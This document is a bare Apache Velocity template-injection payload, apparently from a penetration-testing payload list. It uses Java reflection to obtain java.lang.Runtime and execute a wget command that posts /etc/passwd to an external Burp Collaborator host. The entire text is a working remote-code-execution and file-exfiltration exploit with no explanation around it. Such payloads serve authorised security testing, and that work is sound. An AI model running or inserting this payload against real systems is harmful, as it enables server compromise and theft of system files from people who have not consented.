#set($e="e")
$e.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec("wget --post-file /etc/passwd http://ise4xe3uqeahcyssh0ynsy9tqkwik7.burpcollaborator.net/rcetest?a=a")
